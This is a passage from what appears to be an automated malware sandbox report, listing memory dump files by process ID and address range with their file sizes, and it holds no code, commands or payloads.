                          Filesize

                          3.1MB

                        • memory/2380-4-0x0000000000200000-0x000000000050D000-memory.dmp

                          Filesize

                          3.1MB

                        • memory/2380-3-0x0000000000200000-0x000000000050D000-memory.dmp

                          Filesize

                          3.1MB

                        • memory/2380-2-0x0000000000201000-0x0000000000269000-memory.dmp

                          Filesize

                          416KB

                        • memory/2380-1-0x0000000077A64000-0x0000000077A66000-memory.dmp

                          Filesize

                          8KB

                        • memory/2952-43-0x0000000000400000-0x0000000000457000-memory.dmp

                          Filesize

                          348KB

                        • memory/2952-39-0x0000000000400000-0x0000000000457000-memory.dmp

                          Filesize

                          348KB

                        • memory/2952-46-0x0000000000BE0000-0x0000000000C4C000-memory.dmp

                          Filesize

                          432KB

                        • memory/4628-219-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/4628-660-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/4628-153-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/4628-636-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/4628-177-0x0000000010000000-0x000000001001C000-memory.dmp

                          Filesize

                          112KB

                        • memory/4628-217-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/4628-671-0x0000000000400000-0x0000000000C5C000-memory.dmp

                          Filesize

                          8.4MB

                        • memory/4956-220-0x0000000000B30000-0x00000000011C0000-memory.dmp

                          Filesize

                          6.6MB

                        • memory/4956-218-0x0000000000B30000-0x00000000011C0000-memory.dmp

                          Filesize

                          6.6MB

                        • memory/5092-42-0x0000000000BFE000-0x0000000000BFF000-memory.dmp

                          Filesize

                          4KB

                        • memory/5148-594-0x0000000000640000-0x00000000008F8000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/5148-590-0x0000000000640000-0x00000000008F8000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/5148-595-0x0000000000640000-0x00000000008F8000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/5148-645-0x0000000000640000-0x00000000008F8000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/5148-655-0x0000000000640000-0x00000000008F8000-memory.dmp

                          Filesize

                          2.7MB

                        • memory/5600-3897-0x00000000003D0000-0x00000000006DD000-memory.dmp

                          Filesize

                          3.1MB

                        • memory/5612-614-0x00000000003D0000-0x00000000006DD000-memory.dmp

                          Filesize

                          3.1MB

                        • memory/5832-2324-0x0000000000400000-0x0000000000457000-memory.dmp

                          Filesize

                          348KB